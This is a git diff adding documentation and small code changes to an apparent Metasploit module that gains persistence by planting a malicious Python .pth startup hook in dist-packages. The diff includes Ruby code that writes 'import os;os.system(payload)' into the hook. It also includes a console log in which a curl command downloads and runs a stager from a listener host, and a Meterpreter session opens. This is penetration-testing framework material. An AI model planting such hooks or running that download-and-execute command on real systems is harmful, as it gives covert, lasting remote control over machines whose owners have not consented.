diff --git a/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md b/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md index 8aae87977d..2bbc24f725 100644 --- a/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md +++ b/documentation/modules/exploit/multi/persistence/python_site_specific_hook.md @@ -1,44 +1,67 @@ -The following is the recommended format for module documentation. But feel free to add more content/sections to this. -One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop -functioning in 5+ years, so giving links or specific examples can be VERY helpful. - ## Vulnerable Application -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install -files, as well as instructions on installing/configuring the environment if it is different than a -standard install. Much of this will come from the PR, and can be copy/pasted. +This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in `site-specific` or `dist-packages` directories, any lines beginning with `import` will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions. ## Verification Steps Example steps in this format (is also in the PR): -1. Install the application + 1. Start msfconsole -1. Do: `use [module path]` +1. Get a session +1. Do: `use multi/persistence/python_site_specific_hook` +1. Do: `set session #` 1. Do: `run` -1. You should get a shell. ## Options -List each option and how to use it. -### Option Name +### PYTHON_HOOK_PATH -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. +If user has session to target machine with non-typical Python paths, they can set their own path to Python hooks. + +### EXECUTION_TARGET + +Python has multiple locations, where it can store startup hooks. This option specifies if the target location should be SYSTEM one - i.e. should affect all users - or USER one, which targets current user. ## Scenarios -Specific demo of using the module that might be useful in a real world scenario. -### Version and OS +### Linux pop-os 6.17.4-76061704-generic ``` -code or console output -``` +msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true +[*] Command to run on remote host: curl -so ./xtLDGMnHcvHv http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x ./xtLDGMnHcvHv;./xtLDGMnHcvHv& +[*] Exploit running as background job 9. +[*] Exploit completed, but no session was created. -For example: +[*] Fetch handler listening on 192.168.3.7:8080 +[*] HTTP server started +[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w +msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. Python is present on the system +[*] Detected Python version 3.10 +[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/ +[*] Creating directory /usr/local/lib/python3.10/dist-packages/ +[*] /usr/local/lib/python3.10/dist-packages/ created +[*] Client 192.168.3.7 requested /EO6WzfXF6CGyqdBiy1rT5w +[*] Sending payload to 192.168.3.7 (curl/7.81.0) +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3090404 bytes) to 192.168.3.7 +[*] Meterpreter session 4 opened (192.168.3.7:4444 -> 192.168.3.7:34170) at 2025-11-19 07:04:54 +0100 -To do this specific thing, here's how you do it: +msf exploit(multi/persistence/python_site_specific_hook) > sessions 4 +[*] Starting interaction with 4... + +meterpreter > sysinfo +Computer : 172.16.187.129 +OS : Pop 22.04 (Linux 6.17.4-76061704-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > getuid +Server username: ms ``` -msf > use module_name -msf auxiliary(module_name) > set POWERLEVEL >9000 -msf auxiliary(module_name) > exploit + +### Windows 10.0.15063 +``` + ``` diff --git a/modules/exploits/multi/persistence/python_site_specific_hook.rb b/modules/exploits/multi/persistence/python_site_specific_hook.rb index bf0768e877..9afdd8e244 100644 --- a/modules/exploits/multi/persistence/python_site_specific_hook.rb +++ b/modules/exploits/multi/persistence/python_site_specific_hook.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'Python Site-Specific Hook Persistence', 'Description' => %q{ - TODO + This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Local file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10) if session.platform == 'osx' || session.platform == 'linux' - cmd_exec("mkdir -p #{@hooks_path}") + mkdir(@hooks_path) end fail_with(Failure::PayloadFailed, 'Failed to create malicious hook') unless write_file("#{@hooks_path}#{file_name}.pth", %(import os;os.system("#{payload.encoded}") ))